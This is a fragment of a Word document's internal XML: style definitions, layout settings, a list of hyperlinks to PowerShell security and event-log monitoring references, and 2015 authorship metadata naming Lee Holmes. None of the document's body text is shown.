    <w:rsid w:val="00A91A28"/>
    <w:rsid w:val="00AA3B14"/>
    <w:rsid w:val="00AA6A65"/>
    <w:rsid w:val="00AB59F0"/>
    <w:rsid w:val="00AC0492"/>
    <w:rsid w:val="00AC2C43"/>
    <w:rsid w:val="00AE4CFB"/>
    <w:rsid w:val="00AE4E6D"/>
    <w:rsid w:val="00AE622F"/>
    <w:rsid w:val="00AF1CD1"/>
    <w:rsid w:val="00AF79C5"/>
    <w:rsid w:val="00AF7D71"/>
    <w:rsid w:val="00AF7F9E"/>
    <w:rsid w:val="00B02DA3"/>
    <w:rsid w:val="00B06A4A"/>
    <w:rsid w:val="00B07DE5"/>
    <w:rsid w:val="00B110E4"/>
    <w:rsid w:val="00B17286"/>
    <w:rsid w:val="00B22252"/>
    <w:rsid w:val="00B33126"/>
    <w:rsid w:val="00B36D19"/>
    <w:rsid w:val="00B4238A"/>
    <w:rsid w:val="00B53467"/>
    <w:rsid w:val="00B5404B"/>
    <w:rsid w:val="00B60C36"/>
    <w:rsid w:val="00B67A94"/>
    <w:rsid w:val="00B7752C"/>
    <w:rsid w:val="00B87A8E"/>
    <w:rsid w:val="00B91184"/>
    <w:rsid w:val="00B938E9"/>
    <w:rsid w:val="00BA481C"/>
    <w:rsid w:val="00BA5924"/>
    <w:rsid w:val="00BB4167"/>
    <w:rsid w:val="00BB485C"/>
    <w:rsid w:val="00BD0CA1"/>
    <w:rsid w:val="00BD18D1"/>
    <w:rsid w:val="00BE09AC"/>
    <w:rsid w:val="00BE59B5"/>
    <w:rsid w:val="00BF2AAA"/>
    <w:rsid w:val="00BF779E"/>
    <w:rsid w:val="00C0778B"/>
    <w:rsid w:val="00C17007"/>
    <w:rsid w:val="00C21F80"/>
    <w:rsid w:val="00C22667"/>
    <w:rsid w:val="00C22B02"/>
    <w:rsid w:val="00C25212"/>
    <w:rsid w:val="00C3767A"/>
    <w:rsid w:val="00C422EB"/>
    <w:rsid w:val="00C465B5"/>
    <w:rsid w:val="00C51F51"/>
    <w:rsid w:val="00C57879"/>
    <w:rsid w:val="00C640B1"/>
    <w:rsid w:val="00C7086F"/>
    <w:rsid w:val="00C75FBE"/>
    <w:rsid w:val="00C77F4F"/>
    <w:rsid w:val="00C818CB"/>
    <w:rsid w:val="00C83F87"/>
    <w:rsid w:val="00C85F99"/>
    <w:rsid w:val="00C9329B"/>
    <w:rsid w:val="00CD20D2"/>
    <w:rsid w:val="00CE0ABC"/>
    <w:rsid w:val="00CE3678"/>
    <w:rsid w:val="00CE42B9"/>
    <w:rsid w:val="00CE5BF5"/>
    <w:rsid w:val="00CE7474"/>
    <w:rsid w:val="00CF509F"/>
    <w:rsid w:val="00D072E7"/>
    <w:rsid w:val="00D0736A"/>
    <w:rsid w:val="00D10017"/>
    <w:rsid w:val="00D2212B"/>
    <w:rsid w:val="00D23033"/>
    <w:rsid w:val="00D30DB3"/>
    <w:rsid w:val="00D333AC"/>
    <w:rsid w:val="00D339CD"/>
    <w:rsid w:val="00D40544"/>
    <w:rsid w:val="00D441EB"/>
    <w:rsid w:val="00D579E2"/>
    <w:rsid w:val="00D75B66"/>
    <w:rsid w:val="00D75DE7"/>
    <w:rsid w:val="00D93456"/>
    <w:rsid w:val="00D9661D"/>
    <w:rsid w:val="00D979F1"/>
    <w:rsid w:val="00DA4946"/>
    <w:rsid w:val="00DA5001"/>
    <w:rsid w:val="00DB29E7"/>
    <w:rsid w:val="00DB6A64"/>
    <w:rsid w:val="00DC7051"/>
    <w:rsid w:val="00DD11F5"/>
    <w:rsid w:val="00DD1EC3"/>
    <w:rsid w:val="00DE1E0F"/>
    <w:rsid w:val="00DE37C6"/>
    <w:rsid w:val="00DE4BB3"/>
    <w:rsid w:val="00DE7343"/>
    <w:rsid w:val="00DF1381"/>
    <w:rsid w:val="00DF352C"/>
    <w:rsid w:val="00E1013C"/>
    <w:rsid w:val="00E10645"/>
    <w:rsid w:val="00E15E7D"/>
    <w:rsid w:val="00E16E73"/>
    <w:rsid w:val="00E250B0"/>
    <w:rsid w:val="00E27DC2"/>
    <w:rsid w:val="00E30FCD"/>
    <w:rsid w:val="00E33384"/>
    <w:rsid w:val="00E35C03"/>
    <w:rsid w:val="00E5071E"/>
    <w:rsid w:val="00E56927"/>
    <w:rsid w:val="00E60247"/>
    <w:rsid w:val="00E80BF0"/>
    <w:rsid w:val="00E82FD4"/>
    <w:rsid w:val="00E940D4"/>
    <w:rsid w:val="00E94807"/>
    <w:rsid w:val="00E96B1E"/>
    <w:rsid w:val="00EB0204"/>
    <w:rsid w:val="00EB6D4E"/>
    <w:rsid w:val="00ED392A"/>
    <w:rsid w:val="00ED56C4"/>
    <w:rsid w:val="00ED7A15"/>
    <w:rsid w:val="00EE1496"/>
    <w:rsid w:val="00EE3D83"/>
    <w:rsid w:val="00F004D8"/>
    <w:rsid w:val="00F11AD3"/>
    <w:rsid w:val="00F12D80"/>
    <w:rsid w:val="00F133E2"/>
    <w:rsid w:val="00F1502A"/>
    <w:rsid w:val="00F2749A"/>
    <w:rsid w:val="00F35285"/>
    <w:rsid w:val="00F36A8C"/>
    <w:rsid w:val="00F40991"/>
    <w:rsid w:val="00F4444B"/>
    <w:rsid w:val="00F4473B"/>
    <w:rsid w:val="00F45498"/>
    <w:rsid w:val="00F462B5"/>
    <w:rsid w:val="00F54E9D"/>
    <w:rsid w:val="00F608B9"/>
    <w:rsid w:val="00F627CF"/>
    <w:rsid w:val="00F741A2"/>
    <w:rsid w:val="00F75C07"/>
    <w:rsid w:val="00F85E4F"/>
    <w:rsid w:val="00FB6665"/>
    <w:rsid w:val="00FC50CB"/>
    <w:rsid w:val="00FD2458"/>
    <w:rsid w:val="00FE0093"/>
    <w:rsid w:val="00FE284D"/>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7B24-8520-45CB-AA8E-BBDC6270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DF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C51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0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4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57BD"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="007968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687F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="5B9BD5" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00796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687F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00C51F51"/>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979F1"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ListParagraphChar"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008348DB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00890596"/>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58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9FB"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="006F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9B38C8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00B60C36"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListParagraphChar">
    <w:name w:val="List Paragraph Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="ListParagraph"/>
    <w:uiPriority w:val="34"/>
    <w:rsid w:val="006A76A5"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="006A76A5"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      <w:spacing w:before="200" w:after="120" w:line="276" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="006A76A5"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00223DC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17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6665"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F627CF"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E1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9308">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="587079182">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1031225248">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1083336665">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1460802128">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1777216127">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="236667334">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2045324004">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="638607583">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="154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msdn.com/b/powershell/archive/2013/12/16/powershell-security-best-practices.aspx" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:cn=me@somewhere.com" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nsa.gov/ia/_files/app/Spotting_the_Adversary_with_Windows_Event_Log_Monitor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sdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Public-key_cryptography" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/dd723678(v=ws.10).aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/dn433292.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zure.microsoft.com/blog/2014/11/11/red-teaming-using-cutting-edge-threat-simulation-to-harden-the-microsoft-enterprise-cloud/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc5652" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Public-key_cryptography" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nsa.gov/ia/_files/app/Spotting_the_Adversary_with_Windows_Event_Log_Monitoring.pdf"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www.fireeye.com/resources/pdfs/fireeye-lazanciyan-investigating-powershell-attacks.pdf" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:*leeholm@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CCA4-6A43-4B91-8808-FF8D1B13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7022</TotalTime>
  <Pages>22</Pages>
  <Words>7801</Words>
  <Characters>44467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Holmes ([PS C:\&gt;   ])</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lee Holmes ([PS C:\&gt;   ])</cp:lastModifiedBy>
  <cp:revision>485</cp:revision>
  <cp:lastPrinted>2015-04-06T20:23:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-04-03T18:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-06-24T16:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>